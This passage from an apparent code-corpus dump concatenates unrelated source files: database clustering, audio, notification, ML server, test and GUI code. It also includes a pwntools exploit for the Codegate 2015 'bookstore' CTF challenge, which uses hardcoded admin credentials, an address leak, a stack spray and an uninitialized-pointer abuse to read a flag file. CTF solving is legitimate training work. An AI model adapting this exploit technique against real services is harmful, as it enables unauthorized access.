printer.add('writerfilter::ooxml::OOXMLPropertySetValue', OOXMLPropertySetValuePrinter)
printer.add('writerfilter::ooxml::OOXMLStringValue', OOXMLStringValuePrinter)
printer.add('writerfilter::ooxml::OOXMLIntegerValue', OOXMLIntegerValuePrinter)
printer.add('writerfilter::ooxml::OOXMLHexValue', OOXMLIntegerValuePrinter)
def register_pretty_printers(obj):
printing.register_pretty_printer(printer, obj)
build_pretty_printers()
# vim:set shiftwidth=4 softtabstop=4 expandtab:
|
gpl-3.0
| 8,452,466,231,903,170,000
| 30.238636
| 91
| 0.666788
| false
| 3.740136
| false
| false
| false
|
Pulgama/supriya
|
supriya/commands/SynthDefLoadDirectoryRequest.py
|
1
|
1591
|
import pathlib
import supriya.osc
from supriya.commands.Request import Request
from supriya.commands.RequestBundle import RequestBundle
from supriya.enums import RequestId
class SynthDefLoadDirectoryRequest(Request):
"""
A /d_loadDir request.
"""
### CLASS VARIABLES ###
__slots__ = ("_callback", "_directory_path")
request_id = RequestId.SYNTHDEF_LOAD_DIR
### INITIALIZER ###
def __init__(self, callback=None, directory_path=None):
Request.__init__(self)
if callback is not None:
assert isinstance(callback, (Request, RequestBundle))
self._callback = callback
self._directory_path = pathlib.Path(directory_path).absolute()
### PUBLIC METHODS ###
def to_osc(self, *, with_placeholders=False, with_request_name=False):
if with_request_name:
request_id = self.request_name
else:
request_id = int(self.request_id)
contents = [request_id, str(self.directory_path)]
if self.callback:
contents.append(
self.callback.to_osc(
with_placeholders=with_placeholders,
with_request_name=with_request_name,
)
)
message = supriya.osc.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def callback(self):
return self._callback
@property
def response_patterns(self):
return ["/done", "/d_loadDir"], None
@property
def directory_path(self):
return self._directory_path
|
mit
| 4,937,795,839,363,454,000
| 25.966102
| 74
| 0.607165
| false
| 4.154047
| false
| false
| false
|
openstack/trove
|
trove/common/strategies/cluster/experimental/galera_common/api.py
|
1
|
8545
|
# Copyright [2015] Hewlett-Packard Development Company, L.P.
# Copyright 2016 Tesora Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log as logging
import time
from trove.cluster import models as cluster_models
from trove.cluster.tasks import ClusterTasks
from trove.cluster.views import ClusterView
from trove.common import cfg
from trove.common import exception
from trove.common import server_group as srv_grp
from trove.common.strategies.cluster import base as cluster_base
from trove.extensions.mgmt.clusters.views import MgmtClusterView
from trove.instance.models import DBInstance
from trove.instance.models import Instance
from trove.quota.quota import check_quotas
from trove.taskmanager import api as task_api
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class GaleraCommonAPIStrategy(cluster_base.BaseAPIStrategy):
@property
def cluster_class(self):
return GaleraCommonCluster
@property
def cluster_view_class(self):
return GaleraCommonClusterView
@property
def mgmt_cluster_view_class(self):
return GaleraCommonMgmtClusterView
class GaleraCommonCluster(cluster_models.Cluster):
@staticmethod
def _validate_cluster_instances(context, instances, datastore,
datastore_version):
"""Validate the flavor and volume"""
ds_conf = CONF.get(datastore_version.manager)
num_instances = len(instances)
# Checking volumes and get delta for quota check
cluster_models.validate_instance_flavors(
context, instances, ds_conf.volume_support, ds_conf.device_path)
req_volume_size = cluster_models.get_required_volume_size(
instances, ds_conf.volume_support)
cluster_models.assert_homogeneous_cluster(instances)
deltas = {'instances': num_instances, 'volumes': req_volume_size}
# quota check
check_quotas(context.project_id, deltas)
# Checking networks are same for the cluster
cluster_models.validate_instance_nics(context, instances)
@staticmethod
def _create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration_id):
member_config = {"id": db_info.id,
"instance_type": "member"}
name_index = int(time.time())
for instance in instances:
if not instance.get("name"):
instance['name'] = "%s-member-%s" % (db_info.name,
str(name_index))
name_index += 1
return [Instance.create(context,
instance['name'],
instance['flavor_id'],
datastore_version.image_id,
[], [],
datastore, datastore_version,
instance.get('volume_size', None),
None,
availability_zone=instance.get(
'availability_zone', None),
nics=instance.get('nics', None),
configuration_id=configuration_id,
cluster_config=member_config,
volume_type=instance.get(
'volume_type', None),
modules=instance.get('modules'),
locality=locality,
region_name=instance.get('region_name')
)
for instance in instances]
@classmethod
def create(cls, context, name, datastore, datastore_version,
instances, extended_properties, locality, configuration):
LOG.debug("Initiating Galera cluster creation.")
ds_conf = CONF.get(datastore_version.manager)
# Check number of instances is at least min_cluster_member_count
if len(instances) < ds_conf.min_cluster_member_count:
raise exception.ClusterNumInstancesNotLargeEnough(
num_instances=ds_conf.min_cluster_member_count)
cls._validate_cluster_instances(context, instances, datastore,
datastore_version)
# Updating Cluster Task
db_info = cluster_models.DBCluster.create(
name=name, tenant_id=context.project_id,
datastore_version_id=datastore_version.id,
task_status=ClusterTasks.BUILDING_INITIAL,
configuration_id=configuration)
cls._create_instances(context, db_info, datastore, datastore_version,
instances, extended_properties, locality,
configuration)
# Calling taskmanager to further proceed for cluster-configuration
task_api.load(context, datastore_version.manager).create_cluster(
db_info.id)
return cls(context, db_info, datastore, datastore_version)
def grow(self, instances):
LOG.debug("Growing cluster %s.", self.id)
self.validate_cluster_available()
context = self.context
db_info = self.db_info
datastore = self.ds
datastore_version = self.ds_version
self._validate_cluster_instances(context, instances, datastore,
datastore_version)
db_info.update(task_status=ClusterTasks.GROWING_CLUSTER)
try:
locality = srv_grp.ServerGroup.convert_to_hint(self.server_group)
configuration_id = self.db_info.configuration_id
new_instances = self._create_instances(
context, db_info, datastore, datastore_version, instances,
None, locality, configuration_id)
task_api.load(context, datastore_version.manager).grow_cluster(
db_info.id, [instance.id for instance in new_instances])
except Exception:
db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(context, db_info,
datastore, datastore_version)
def shrink(self, instances):
"""Removes instances from a cluster."""
LOG.debug("Shrinking cluster %s.", self.id)
self.validate_cluster_available()
removal_instances = [Instance.load(self.context, inst_id)
for inst_id in instances]
db_instances = DBInstance.find_all(
cluster_id=self.db_info.id, deleted=False).all()
if len(db_instances) - len(removal_instances) < 1:
raise exception.ClusterShrinkMustNotLeaveClusterEmpty()
self.db_info.update(task_status=ClusterTasks.SHRINKING_CLUSTER)
try:
task_api.load(self.context, self.ds_version.manager
).shrink_cluster(self.db_info.id,
[instance.id
for instance in removal_instances])
except Exception:
self.db_info.update(task_status=ClusterTasks.NONE)
raise
return self.__class__(self.context, self.db_info,
self.ds, self.ds_version)
def restart(self):
self.rolling_restart()
def upgrade(self, datastore_version):
self.rolling_upgrade(datastore_version)
def configuration_attach(self, configuration_id):
self.rolling_configuration_update(configuration_id)
def configuration_detach(self):
self.rolling_configuration_remove()
class GaleraCommonClusterView(ClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
class GaleraCommonMgmtClusterView(MgmtClusterView):
def build_instances(self):
return self._build_instances(['member'], ['member'])
|
apache-2.0
| 6,938,992,577,265,040,000
| 38.37788
| 79
| 0.604447
| false
| 4.589151
| true
| false
| false
|
chenyoufu/writeups
|
jarvisoj/basic_cake.py
|
1
|
1448
|
s = '''
nit yqmg mqrqn bxw mtjtm nq rqni fiklvbxu mqrqnl xwg dvmnzxu lqjnyxmt xatwnl, rzn nit uxnntm xmt zlzxuuk mtjtmmtg nq xl rqnl. nitmt vl wq bqwltwlzl qw yivbi exbivwtl pzxuvjk xl mqrqnl rzn nitmt vl atwtmxu xamttetwn xeqwa tsftmnl, xwg nit fzruvb, nixn mqrqnl ntwg nq gq lqet qm xuu qj nit jquuqyvwa: xbbtfn tutbnmqwvb fmqamxeevwa, fmqbtll gxnx qm fiklvbxu ftmbtfnvqwl tutbnmqwvbxuuk, qftmxnt xznqwqeqzluk nq lqet gtamtt, eqdt xmqzwg, qftmxnt fiklvbxu fxmnl qj vnltuj qm fiklvbxu fmqbtlltl, ltwlt xwg exwvfzuxnt nitvm twdvmqwetwn, xwg tsivrvn vwntuuvatwn rtixdvqm - tlftbvxuuk rtixdvqm yivbi evevbl izexwl qm qnitm xwvexul. juxa vl lzrlnvnzntfxllvldtmktxlkkqzaqnvn. buqltuk mtuxntg nq nit bqwbtfn qj x mqrqn vl nit jvtug qj lkwnitnvb rvquqak, yivbi lnzgvtl twnvnvtl yiqlt wxnzmt vl eqmt bqefxmxrut nq rtvwal nixw nq exbivwtl.
'''
print [x for x in s.split(' ') if len(x) == 1]
print [x for x in s.split(' ') if len(x) == 2]
m = {
'a': 'g',
'b': 'c',
'd': 'v',
'e': 'm',
'f': 'p',
'x': 'a',
'r': 'b',
's': 'x',
'z': 'u',
'g': 'd',
'y': 'w',
'j': 'f',
'u': 'l',
'k': 'y',
'w': 'n',
'q': 'o',
'v': 'i',
'l': 's',
'n': 't',
'i': 'h',
't': 'e',
'm': 'r'
}
ss = ''
for x in s:
if x in m.keys():
ss += m[x]
else:
ss += x
print ss
flag = 'lzrlnvnzntfxllvldtmktxlkkqzaqnvn'
for f in flag:
if f not in m.keys():
print f
|
gpl-3.0
| -6,093,663,068,113,639,000
| 29.166667
| 823
| 0.608425
| false
| 1.964722
| false
| false
| false
|
swprojects/Serial-Sequence-Creator
|
dialogs/setvoltage.py
|
1
|
5066
|
"""
Description:
Requirements: pySerial, wxPython Phoenix
glossary and of other descriptions:
DMM - digital multimeter
PSU - power supply
SBC - single board computer
INS - general instrument commands
GEN - general sequence instructions
"""
import logging
import sys
import time
import wx
import theme
import base
class SetVoltage(wx.Dialog):
def __init__(self, parent, instruments):
wx.Dialog.__init__(self,
parent,
title="Set Voltage")
panel = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer(wx.HORIZONTAL)
sbox = wx.StaticBox(panel, label="")
sbox_sizer = wx.StaticBoxSizer(sbox, wx.HORIZONTAL)
grid = wx.GridBagSizer(5,5)
row = 0
# row += 1 #let's start at 1, to give some space
lbl_psu = wx.StaticText(panel, label="Power Supply:")
choices = ["Choose on execution"]
choices.extend(instruments)
self.cbox_psu = wx.ComboBox(panel, choices=choices)
# self.cbox_psu.Bind(wx.EVT_COMBOBOX, self.OnPsuSelected)
grid.Add(lbl_psu, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.cbox_psu, pos=(row,1), span=(0,3), flag=wx.ALL|wx.EXPAND, border=5)
grid.AddGrowableCol(1)
row += 1
text_voltage = wx.StaticText(panel, label="Set Voltage:")
self.spin_voltage = wx.SpinCtrl(panel, max=30, min=0, size=(50, -1))
self.spin_voltage2 = wx.SpinCtrl(panel, max=99, min=0, size=(50, -1))
self.spin_voltage.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.spin_voltage2.Bind(wx.EVT_SPINCTRL, self.OnSpinVoltage)
self.lbl_voltage = wx.StaticText(panel, label="0.0v")
grid.Add(text_voltage, pos=(row,0), flag=wx.ALL|wx.EXPAND, border=5)
grid.Add(self.spin_voltage, pos=(row,1), flag=wx.ALL, border=5)
grid.Add(self.spin_voltage2, pos=(row,2), flag=wx.ALL, border=5)
grid.Add(self.lbl_voltage, pos=(row,3), flag=wx.ALL|wx.EXPAND, border=5)
sbox_sizer.Add(grid, 1, wx.ALL|wx.EXPAND, 0)
sbox_sizer.AddSpacer(10)
#-----
hsizer = wx.BoxSizer(wx.HORIZONTAL)
hsizer.AddStretchSpacer()
btn_cancel = wx.Button(panel, label="Cancel", id=wx.ID_CANCEL)
btn_cancel.Bind(wx.EVT_BUTTON, self.OnButton)
self.btn_add = wx.Button(panel, label="Add", id=wx.ID_OK)
self.btn_add.Bind(wx.EVT_BUTTON, self.OnButton)
hsizer.Add(btn_cancel, 0, wx.ALL|wx.EXPAND, 5)
hsizer.Add(self.btn_add, 0, wx.ALL|wx.EXPAND, 5)
#add to main sizer
sizer.Add(sbox_sizer, 0, wx.ALL|wx.EXPAND, 2)
sizer.Add(hsizer, 0, wx.ALL|wx.EXPAND, 5)
panel.SetSizer(sizer)
w, h = sizer.Fit(self)
# self.SetSize((w, h*1.5))
# self.SetMinSize((w, h*1.5))
# self.SetMaxSize(sizer.Fit(self))
try:
self.SetIcon(theme.GetIcon("psu_png"))
except:
pass
self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)
def OnKeyUp(self, event):
key = event.GetKeyCode()
print(event)
if key == wx.KEY_ESCAPE:
self.EndModal(wx.ID_CANCEL)
def OnSpinVoltage(self, event=None):
v0 = self.spin_voltage.GetValue()
v1 = self.spin_voltage2.GetValue()
label = str(v0) + "." + str(v1) + "v"
self.lbl_voltage.SetLabel(label)
def OnButton(self, event):
e = event.GetEventObject()
label = e.GetLabel()
id = e.GetId()
if label == "Cancel":
self.EndModal(id)
elif label == "Add":
self.EndModal(id)
def SetValue(self, data):
params = data["parameters"]
params = "), " + params[1:-1] + ", (" #so we can split it easier
param_dict = {}
params = params.split("), (")
for param in params:
param = param[1: -1]
if param == "":
continue
key, value = param.split("', '")
param_dict[key] = value
self.cbox_psu.SetValue(param_dict["psu"])
self.lbl_voltage.SetLabel(param_dict["v0"])
spin1, spin2 = param_dict["v0"][:-1].split(".")
self.spin_voltage.SetValue(spin1)
self.spin_voltage2.SetValue(spin2)
def GetValue(self):
psu = self.cbox_psu.GetValue()
if psu != "":
for char in psu:
if char.isdigit() or char.isalpha():
continue
psu = psu.replace(char, "_")
data = [("psu", psu),
("v0", self.lbl_voltage.GetLabel())]
data = {"action":"Set Voltage",
"parameters":str(data),}
return data
|
mit
| -3,217,298,695,919,984,600
| 30.867925
| 89
| 0.530004
| false
| 3.453306
| false
| false
| false
|
NunoEdgarGub1/nupic
|
nupic/simple_server.py
|
1
|
3599
|
#! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
A simple web server for interacting with NuPIC.
Note: Requires web.py to run (install using '$ pip install web.py')
"""
import os
import sys
# The following loop removes the nupic.nupic package from the
# PythonPath (sys.path). This is necessary in order to let web
# import the built in math module rather than defaulting to
# nupic.math
while True:
try:
sys.path.remove(os.path.dirname(os.path.realpath(__file__)))
except:
break
import datetime
import json
import web
from nupic.frameworks.opf.modelfactory import ModelFactory
g_models = {}
urls = (
# Web UI
"/models", "ModelHandler",
r"/models/([-\w]*)", "ModelHandler",
r"/models/([-\w]*)/run", "ModelRunner",
)
class ModelHandler(object):
def GET(self):
"""
/models
returns:
[model1, model2, model3, ...] list of model names
"""
global g_models
return json.dumps({"models": g_models.keys()})
def POST(self, name):
"""
/models/{name}
schema:
{
"modelParams": dict containing model parameters
"predictedFieldName": str
}
returns:
{"success":name}
"""
global g_models
data = json.loads(web.data())
modelParams = data["modelParams"]
predictedFieldName = data["predictedFieldName"]
if name in g_models.keys():
raise web.badrequest("Model with name <%s> already exists" % name)
model = ModelFactory.create(modelParams)
model.enableInference({'predictedField': predictedFieldName})
g_models[name] = model
return json.dumps({"success": name})
class ModelRunner(object):
def POST(self, name):
"""
/models/{name}/run
schema:
{
predictedFieldName: value
timestamp: %m/%d/%y %H:%M
}
NOTE: predictedFieldName MUST be the same name specified when
creating the model.
returns:
{
"predictionNumber":<number of record>,
"anomalyScore":anomalyScore
}
"""
global g_models
data = json.loads(web.data())
data["timestamp"] = datetime.datetime.strptime(
data["timestamp"], "%m/%d/%y %H:%M")
if name not in g_models.keys():
raise web.notfound("Model with name <%s> does not exist." % name)
modelResult = g_models[name].run(data)
predictionNumber = modelResult.predictionNumber
anomalyScore = modelResult.inferences["anomalyScore"]
return json.dumps({"predictionNumber": predictionNumber,
"anomalyScore": anomalyScore})
web.config.debug = False
app = web.application(urls, globals())
if __name__ == "__main__":
app.run()
|
gpl-3.0
| 307,131,252,297,311,600
| 23.82069
| 72
| 0.639066
| false
| 4.012263
| false
| false
| false
|
ARudiuk/mne-python
|
mne/io/array/tests/test_array.py
|
3
|
3552
|
from __future__ import print_function
# Author: Eric Larson <larson.eric.d@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
import warnings
import matplotlib
from numpy.testing import assert_array_almost_equal, assert_allclose
from nose.tools import assert_equal, assert_raises, assert_true
from mne import find_events, Epochs, pick_types
from mne.io import Raw
from mne.io.array import RawArray
from mne.io.tests.test_raw import _test_raw_reader
from mne.io.meas_info import create_info, _kind_dict
from mne.utils import slow_test, requires_version, run_tests_if_main
matplotlib.use('Agg') # for testing don't use X server
warnings.simplefilter('always') # enable b/c these tests might throw warnings
base_dir = op.join(op.dirname(__file__), '..', '..', 'tests', 'data')
fif_fname = op.join(base_dir, 'test_raw.fif')
@slow_test
@requires_version('scipy', '0.12')
def test_array_raw():
"""Test creating raw from array
"""
import matplotlib.pyplot as plt
# creating
raw = Raw(fif_fname).crop(2, 5, copy=False)
data, times = raw[:, :]
sfreq = raw.info['sfreq']
ch_names = [(ch[4:] if 'STI' not in ch else ch)
for ch in raw.info['ch_names']] # change them, why not
# del raw
types = list()
for ci in range(102):
types.extend(('grad', 'grad', 'mag'))
types.extend(['stim'] * 9)
types.extend(['eeg'] * 60)
# wrong length
assert_raises(ValueError, create_info, ch_names, sfreq, types)
# bad entry
types.append('foo')
assert_raises(KeyError, create_info, ch_names, sfreq, types)
types[-1] = 'eog'
# default type
info = create_info(ch_names, sfreq)
assert_equal(info['chs'][0]['kind'], _kind_dict['misc'][0])
# use real types
info = create_info(ch_names, sfreq, types)
raw2 = _test_raw_reader(RawArray, test_preloading=False,
data=data, info=info, first_samp=2 * data.shape[1])
data2, times2 = raw2[:, :]
assert_allclose(data, data2)
assert_allclose(times, times2)
assert_true('RawArray' in repr(raw2))
assert_raises(TypeError, RawArray, info, data)
# filtering
picks = pick_types(raw2.info, misc=True, exclude='bads')[:4]
assert_equal(len(picks), 4)
raw_lp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_lp.filter(0., 4.0 - 0.25, picks=picks, n_jobs=2)
raw_hp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_hp.filter(8.0 + 0.25, None, picks=picks, n_jobs=2)
raw_bp = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bp.filter(4.0 + 0.25, 8.0 - 0.25, picks=picks)
raw_bs = raw2.copy()
with warnings.catch_warnings(record=True):
raw_bs.filter(8.0 + 0.25, 4.0 - 0.25, picks=picks, n_jobs=2)
data, _ = raw2[picks, :]
lp_data, _ = raw_lp[picks, :]
hp_data, _ = raw_hp[picks, :]
bp_data, _ = raw_bp[picks, :]
bs_data, _ = raw_bs[picks, :]
sig_dec = 11
assert_array_almost_equal(data, lp_data + bp_data + hp_data, sig_dec)
assert_array_almost_equal(data, bp_data + bs_data, sig_dec)
# plotting
raw2.plot()
raw2.plot_psd()
plt.close('all')
# epoching
events = find_events(raw2, stim_channel='STI 014')
events[:, 2] = 1
assert_true(len(events) > 2)
epochs = Epochs(raw2, events, 1, -0.2, 0.4, preload=True)
epochs.plot_drop_log()
epochs.plot()
evoked = epochs.average()
evoked.plot()
assert_equal(evoked.nave, len(events) - 1)
plt.close('all')
run_tests_if_main()
|
bsd-3-clause
| -862,542,634,687,912,300
| 32.509434
| 79
| 0.630349
| false
| 2.977368
| true
| false
| false
|
Qwaz/solved-hacking-problem
|
Codegate/2015 Quals/bookstore/bookstore.py
|
1
|
1395
|
from pwn import *
def talk(send, until, no_newline=False):
if until:
str = r.recvuntil(until)
print str + send
if no_newline:
r.send(send)
else:
r.sendline(send)
else:
str = r.recv()
print str + send
if no_newline:
r.send(send)
else:
r.sendline(send)
r = remote('localhost', 8020)
# Login
talk('helloadmin', 'ID : ')
talk('iulover!@#$%', 'PASSWORD : ')
# Add Book
talk('1', '> ')
talk('book', '\n')
talk('desc', '\n')
talk('0', '\n')
# Modify Price and Stock
talk('2', '> ')
talk('0', 'No : ')
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('aaaa'*100, '\n')
talk('xxxx'*100, 'description\n')
talk('0', 'menu!\n')
# Get Offset
talk('4', '> ')
offset_before = r.recvuntil('a'*20)
offset_str = r.recvuntil('> ')
offset = u32(offset_str[8:12])
log.success("%x" % offset)
offset = offset - 0x9AD + 0x8DB
log.success("%x" % offset)
print offset_before + offset_str
# Fill Stack
r.sendline('2')
talk('0', 'No : ')
talk('2', 'menu!\n')
talk(p32(offset)*750, '\n')
# Uninitialized Shipping Pointer
talk('3', 'menu!\n')
talk('-1', '\n')
talk('-1', '\n')
talk('0', '\n')
talk('1', '\n')
talk('./flag', '\n', no_newline=True)
talk('desc', 'description\n')
# Modify Freeshipping
talk('4', 'menu!\n')
talk('1', '\n')
talk('0', 'menu!\n')
# Call ViewBook
talk('3', '> ')
talk('0', 'No : ')
# Close Program
talk('0', '> ')
|
gpl-2.0
| -2,153,698,298,135,402,800
| 16.658228
| 40
| 0.564158
| false
| 2.434555
| false
| false
| false
|
SRabbelier/Melange
|
app/soc/views/models/notification.py
|
1
|
9142
|
#!/usr/bin/env python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains the view code for Notifications.
"""
__authors__ = [
'"Lennard de Rijk" <ljvderijk@gmail.com>',
]
import time
from google.appengine.ext import db
from django import forms
from django import http
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.logic.models.notification import logic as notification_logic
from soc.logic.models.site import logic as site_logic
from soc.logic.models.user import logic as user_logic
from soc.models import notification as notification_model
from soc.views import helper
from soc.views.helper import access
from soc.views.helper import decorators
from soc.views.helper import lists as list_helper
from soc.views.helper import redirects
from soc.views.models import base
class CreateForm(helper.forms.BaseForm):
"""Form for creating a Notification.
"""
# to user field
to_user = forms.fields.CharField(label='To User')
def __init__(self, *args, **kwargs):
""" Calls super and then redefines the order in which the fields appear.
for parameters see BaseForm.__init__()
"""
super(CreateForm, self).__init__(*args, **kwargs)
# set form fields order
self.fields.keyOrder = ['to_user', 'subject', 'message']
class Meta:
"""Inner Meta class that defines some behavior for the form.
"""
model = notification_model.Notification
fields = None
# exclude the necessary fields from the form
exclude = ['link_id', 'scope', 'scope_path', 'from_user', 'unread']
clean_to_user = cleaning.clean_existing_user('to_user')
class View(base.View):
"""View methods for the Notification model.
"""
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.Checker(params)
rights['edit'] = ['deny']
rights['show'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['delete'] = [('checkIsMyEntity', [notification_logic, 'scope_path'])]
rights['list'] = ['checkIsUser']
# create is developer only for the time being to test functionality
rights['create'] = ['checkIsDeveloper']
new_params = {}
new_params['logic'] = notification_logic
new_params['rights'] = rights
new_params['name'] = "Notification"
new_params['no_create_with_key_fields'] = True
new_params['create_form'] = CreateForm
new_params['edit_redirect'] = '/%(url_name)s/list'
new_params['public_configuration'] = {"multiselect": True}
new_params['public_field_prefetch'] = ['from_user']
new_params['public_field_extra'] = lambda entity: {
"from": entity.from_user.name if entity.from_user else
site_logic.getSingleton().site_name,
"unread": "Not Read" if entity.unread else "Read",
}
new_params['public_field_props'] = {
"unread": {
"stype": "select",
"editoptions": {"value": ":All;^Read$:Read;^Not Read$:Not Read"}
}
}
new_params['public_conf_extra'] = {
"multiselect": True,
}
new_params['public_field_keys'] = ["unread", "from", "subject",
"created_on",]
new_params['public_field_names'] = ["Unread", "From", "Subject",
"Received on"]
new_params['public_button_global'] = [
{
'bounds': [1,'all'],
'id': 'mark_read',
'caption': 'Mark as Read',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'mark_unread',
'caption': 'Mark as Unread',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
},
{
'bounds': [1,'all'],
'id': 'delete',
'caption': 'Delete Notification',
'type': 'post',
'parameters': {
'url': '',
'keys': ['key'],
'refresh': 'current',
}
}]
params = dicts.merge(params, new_params)
params['public_row_extra'] = lambda entity: {
"link": redirects.getPublicRedirect(entity, params)
}
super(View, self).__init__(params=params)
@decorators.merge_params
@decorators.check_access
def list(self, request, access_type, page_name=None, params=None,
filter=None, order=None, **kwargs):
"""Lists all notifications that the current logged in user has stored.
for parameters see base.list()
"""
if request.method == 'POST':
return self.listPost(request, params, **kwargs)
else: # request.method == 'GET'
if not order:
order = ['-created_on']
user_entity = user_logic.getCurrentUser()
filter = {'scope': user_entity}
return super(View, self).list(request, access_type, page_name=page_name,
params=params, filter=filter, order=order,
**kwargs)
def listPost(self, request, params, **kwargs):
"""Handles the POST request for the list of notifications.
"""
import logging
from django.utils import simplejson
post_dict = request.POST
data = simplejson.loads(post_dict.get('data', '[]'))
button_id = post_dict.get('button_id', '')
user_entity = user_logic.getCurrentUser()
notifications = []
for selection in data:
notification = notification_logic.getFromKeyName(selection['key'])
if not notification:
logging.error('No notification found for %(key)s' %selection)
continue
if notification.scope.key() == user_entity.key():
notifications.append(notification)
if button_id == 'delete':
for notification in notifications:
notification_logic.delete(notification)
elif button_id == 'mark_read' or button_id == 'mark_unread':
if button_id == 'mark_read':
# mark all the Notifications selected as read
fields = {'unread': False}
elif button_id == 'mark_unread':
# mark all the Notifications selected as unread
fields = {'unread': True}
for notification in notifications:
notification_logic.updateEntityProperties(notification, fields,
store=False)
db.put(notifications)
# return a 200 response to signal that all is okay
return http.HttpResponseRedirect('')
def _editPost(self, request, entity, fields):
"""See base.View._editPost().
"""
# get the current user
current_user = user_logic.getCurrentUser()
fields['link_id'] = 't%i' % (int(time.time()*100))
fields['scope'] = fields['to_user']
fields['from_user'] = current_user
fields['scope_path'] = fields['to_user'].link_id
def _editSeed(self, request, seed):
"""Checks if scope_path is seeded and puts it into to_user.
for parameters see base._editSeed()
"""
# if scope_path is present
if 'scope_path' in seed.keys():
# fill the to_user field with the scope path
seed['to_user'] = seed['scope_path']
def _public(self, request, entity, context):
"""Marks the Notification as read if that hasn't happened yet.
for parameters see base._public()
"""
# if the user viewing is the user for which this notification is meant
# and the notification has not been read yet
if entity.unread:
# get the current user
user = user_logic.getCurrentUser()
# if the message is meant for the user that is reading it
# pylint: disable=E1103
if entity.scope.key() == user.key():
# mark the entity as read
self._logic.updateEntityProperties(entity, {'unread' : False} )
context['entity_type_url'] = self._params['url_name']
context['entity_suffix'] = entity.key().id_or_name() if entity else None
context['page_name'] = 'Notification - %s' % (entity.subject)
return True
view = View()
admin = decorators.view(view.admin)
create = decorators.view(view.create)
edit = decorators.view(view.edit)
delete = decorators.view(view.delete)
list = decorators.view(view.list)
public = decorators.view(view.public)
export = decorators.view(view.export)
|
apache-2.0
| -9,177,998,094,437,962,000
| 30.415808
| 80
| 0.618355
| false
| 3.955863
| false
| false
| false
|
vaizguy/cryptikchaos
|
src/cryptikchaos/core/gui/service.py
|
1
|
5439
|
'''
Created on Oct 8, 2013
This file is part of CryptikChaos.
CryptikChaos is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CryptikChaos is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CryptikChaos. If not, see <http://www.gnu.org/licenses/>.
@author: vaizguy
'''
__author__ = "Arun Vaidya"
__version__ = "0.6.1"
from kivy.app import App
from kivy.resources import resource_add_path
from kivy.logger import Logger
from kivy.core.window import Window
from kivy.clock import Clock
from cryptikchaos.core.env.configuration import constants
try:
from cryptikchaos.libs.garden.navigationdrawer \
import NavigationDrawer
except ImportError:
from kivy.garden.navigationdrawer import NavigationDrawer
else:
pass
from cryptikchaos.core.gui.mainpanel import MainPanel
from cryptikchaos.core.gui.sidepanel import SidePanel
# Add kivy resource paths
resource_add_path(constants.KIVY_RESOURCE_PATH_1)
resource_add_path(constants.KIVY_RESOURCE_PATH_2)
class GUIService(App):
"Graphical user interface service."
# Init attributes
core_services = None
def __init__(self, handleinput_cmd_hook, getcommands_cmd_hook, **kwargs):
# Init App
super(GUIService, self).__init__(**kwargs)
# Disable default kivy settings
self.use_kivy_settings = False
# Main drawer
self.drawer = NavigationDrawer()
# Set up Main panel
self.main_panel = MainPanel(
# drawer obj
drawer=self.drawer,
# Console splash greeting
greeting=constants.GUI_WELCOME_MSG,
)
# Set up Side pane
self.side_panel = SidePanel(
# drawer obj
drawer=self.drawer,
# screen manager obj
main_panel=self.main_panel
)
# Apeend text to console hook
self.inputtext_gui_hook = self.main_panel.inputtext_gui_hook
# Get App GUI Width
